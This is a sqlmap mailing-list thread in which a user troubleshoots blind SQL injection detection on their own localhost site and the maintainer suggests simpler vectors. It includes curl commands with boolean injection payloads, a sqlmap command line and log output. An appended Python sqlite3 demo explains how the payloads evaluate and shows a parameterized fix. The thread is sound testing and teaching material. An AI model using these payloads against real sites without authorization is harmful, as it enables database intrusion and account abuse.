Hi.
This looks strange:
1'%20OR 1=1 AND 1='1
and
1' OR 1=1 AND 1='2
Could you please try to find the simplest vectors/payloads that work, e.g.:
1' AND '1'='1
1' AND '1'='2
From these payloads I am not sure why there is OR 1=1 and how this is
evaluated to True or False (as OR 1=1 should evaluate in normal cases to
True in both vectors you've sent)
Kind regards
On Sat, Jan 7, 2012 at 5:10 PM, cats <d...@alcor.se> wrote:
> Ok so I know that my site has an sqli (and boolean/mysql time based).
> I even tried both of them myself and the results are very clear and
> simple, yet sqlmap doesn't seem to see it. It can find the time based at
> first, but it always ends up saying that it's a false positive.
>
> cURL will give me the following result from the page, using "and boolean
> based sqli" with a true statement:
>
> curl --data "lostpass=1'%20OR 1=1 AND 1='1"
> http://localhost/account/index.php
>
> <div class='message' style='padding:10px;'>Your password was e-mailed to
> 1' OR 1='1</div>
>
>
> And now a false one
>
> curl --data "lostpass=1' OR 1=1 AND 1='2"
> http://localhost/account/index.php
>
>
> <td class='message'>The email address you entered 1' OR 1=1 AND 1='2
> does not exist</p>
>
>
> I have tried with --string and --text-only with sqlmap, but I get the
> same results over and over. Here's some sample output:
>
> python sqlmap.py -u "http://localhost/account/index.php" --random-agent
> --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to"
> --text-only --delay=5 --technique=TB
>
>
> [16:57:34] [INFO] testing connection to the target url
> [16:57:49] [INFO] heuristics detected web page charset 'ascii'
> [16:57:50] [INFO] testing if the provided string is within the target
> URL page content
> [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
> [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
> [16:58:13] [INFO] POST parameter 'lostpass' is dynamic
> [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass'
> might not be injectable
> [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
> [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND
> time-based blind' injectable
> [17:00:48] [INFO] checking if the injection point on POST parameter
> 'lostpass' is a false positive
> [17:03:09] [WARNING] false positive injection point detected
> [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
> [17:03:09] [CRITICAL] all parameters appear to be not injectable.
>
> I tried with a sleep(5) injection manually as well, and it works like a
> charm. Any ideas?
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
infrastructure or vast IT resources to deliver seamless, secure access to
virtual desktops. With this all-in-one solution, easily deploy virtual
desktops for less than the cost of PCs and save 60% on VDI infrastructure
costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
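To see what the two pairs of vectors discussed in this thread actually do against a lookup built by string concatenation, here is an added example (not the original poster's code, not sqlmap's, and not from the site in question) using Python's sqlite3 with a constructed accounts table. It assumes the lookup has the shape `WHERE email = '<lostpass>'`, which is an assumption, not something the thread states. One caveat: SQLite, unlike MySQL, does not treat the integer literal 1 and the text literal '1' as equal, so the trailing comparison is written as `'1'='1'` rather than `1='1'` as in the posted payloads. The parameterized lookup at the end is the hardened form that makes both pairs of vectors inert.

```python
import sqlite3

# Constructed stand-in for the site's account table (assumed schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (email TEXT PRIMARY KEY)")
    conn.executemany("INSERT INTO accounts VALUES (?)",
                     [("alice@example.com",), ("bob@example.com",)])
    return conn

def lookup_concat(conn, lostpass):
    # Vulnerable shape: the POST value is pasted into the WHERE clause,
    # so quotes and operators in it become part of the SQL.
    sql = "SELECT email FROM accounts WHERE email = '" + lostpass + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_param(conn, lostpass):
    # Hardened shape: the value is bound as data and never parsed as SQL.
    rows = conn.execute("SELECT email FROM accounts WHERE email = ?", (lostpass,))
    return [row[0] for row in rows]

def page_says_exists(rows):
    # Model of the two responses in the thread: a matching row produces
    # "Your password was e-mailed to ...", no row produces "does not exist".
    return len(rows) > 0

# The OR vectors from the thread, with the last comparison as text-to-text
# (SQLite does not coerce 1='1' to true the way MySQL does).
OR_TRUE = "1' OR 1=1 AND '1'='1"
OR_FALSE = "1' OR 1=1 AND '1'='2"

# The simpler AND vectors, appended to whatever base value is sent.
AND_TRUE = "' AND '1'='1"
AND_FALSE = "' AND '1'='2"

def or_demo(conn):
    # email='1' is false, so whether SQL parses the clause as
    # (false OR 1=1) AND c  or  false OR (1=1 AND c), the result is c:
    # the trailing '1'='1' / '1'='2' decides the answer, not the OR 1=1.
    return (page_says_exists(lookup_concat(conn, OR_TRUE)),
            page_says_exists(lookup_concat(conn, OR_FALSE)))

def and_demo(conn, base):
    # With a base value that matches no account, both AND vectors are
    # false (false AND anything), so the page answers the same way twice
    # and a boolean comparison has nothing to distinguish. With a base
    # value that exists, the pair splits true/false as expected.
    return (page_says_exists(lookup_concat(conn, base + AND_TRUE)),
            page_says_exists(lookup_concat(conn, base + AND_FALSE)))

def hardened_demo(conn):
    # Bound parameters: both vectors are looked up as literal e-mail
    # addresses and match nothing.
    return (lookup_param(conn, OR_TRUE), lookup_param(conn, OR_FALSE))

if __name__ == "__main__":
    db = make_db()
    print("OR vectors, nonexistent base:", or_demo(db))
    print("AND vectors, base '1':", and_demo(db, "1"))
    print("AND vectors, existing base:", and_demo(db, "alice@example.com"))
    print("parameterized lookup:", hardened_demo(db))
```

The point worth taking from the run is the second line: with a base value that matches no row, the AND pair gives the same "does not exist" answer for both the true and the false condition, while the OR pair splits because its trailing comparison alone decides the outcome once `email='1'` is false.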